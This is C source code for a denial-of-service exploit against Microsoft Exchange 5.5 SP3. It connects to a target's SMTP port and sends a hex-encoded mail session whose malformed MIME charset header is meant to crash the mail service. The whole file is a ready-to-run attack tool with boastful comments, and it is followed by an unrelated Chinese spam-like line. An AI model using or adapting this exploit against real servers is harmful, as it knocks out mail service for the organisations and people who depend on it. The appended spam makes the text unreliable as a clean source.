/* * Okay, now THIS is lame. * * TESSA: The Exchange Simple Service Assimilator * ---------------------------------------------- * * This will crash a 'Microsoft Exchange 5.5 SP3 Internet Mail Service * and Information Store' (what's in a name) * * For people who got a little brains.. translate the shellcode, it will become * more clear for you. * * by incubus http://securax.org/incubus * * All my love: Tessa. * Respect: #securax@efnet, mr_magnet, axess, f0bic, lamagra and steven. * * Respect and words of thank to Noam @ Beyondsecurity. * */ #include #include #include #include #include #include #include #include #define SMTP_PORT 25 int main(int argc, char **argv){ int i, sock, result; unsigned int port; struct sockaddr_in name; struct hostent *hostinfo; /* wooooow dude, check out my ub3rl33t sh3llk0de */ /* man, i do really feel like a haX0r kiddie now */ char buf[384] = "\x48\x45\x4c\x4f\x0d\x0a\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a" "\x20\x72\x6f\x6f\x74\x40\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e" "\x63\x6f\x6d\x0d\x0a\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x61\x64" "\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x0d\x0a\x44\x41\x54" "\x41\x0d\x0a\x0d\x0a\x4d\x49\x4d\x45\x2d\x56\x65\x72\x73\x69\x6f" "\x6e\x3a\x20\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" "\x54\x79\x70\x65\x3a\x20\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f" "\x61\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x3b\x0d\x0a\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22" "\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d\x4b\x54" "\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x22\x0d\x0a\x0d\x0a\x20" "\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d" "\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x0d\x0a\x0d\x0a" "\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" "\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x0d\x0a\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x63\x68\x61\x72\x73\x65\x74\x20\x3d" "\x20\x22\x22\x0d\x0a\x0d\x0a\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d" "\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e" "\x67\x3a\x20\x37\x62\x69\x74\x0d\x0a\x0d\x0a\x20\x54\x68\x69\x73" "\x20\x6d\x65\x73\x73\x61\x67\x65\x20\x69\x73\x20\x74\x65\x73\x74" "\x0d\x0a\x0d\x0a\x20\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61" "\x72\x79\x20\x31\x2d\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48" "\x6b\x2d\x2d\x0d\x0a\x20\x0d\x0a\x20\x2e\x0d\x0a\x20\x0d\x0a\x20" "\x0d\x0a\x51\x55\x49\x54"; /* phew.. */ if (argc < 2){ fprintf (stdout, "Microsoft Exchange 5.5 SP3 Denial of Service\n--------------------------------------------\n"); fprintf (stdout, "You better do %s \n", argv[0]); fprintf (stdout, "by incubus \n\n"); exit(0); } if (argc < 3) port = SMTP_PORT; else port = atoi(argv[2]); hostinfo=gethostbyname(argv[1]); if (!hostinfo){ herror("Damn!"); exit(-1); } name.sin_family=AF_INET; name.sin_port=htons(port); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { herror("Damn!"); exit(-1); } result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (result != 0) { herror("Damn!"); exit(-1); } send(sock, buf, sizeof(buf), 0); fprintf (stdout, "Done\n"); close(sock); } }

亚洲欧美在线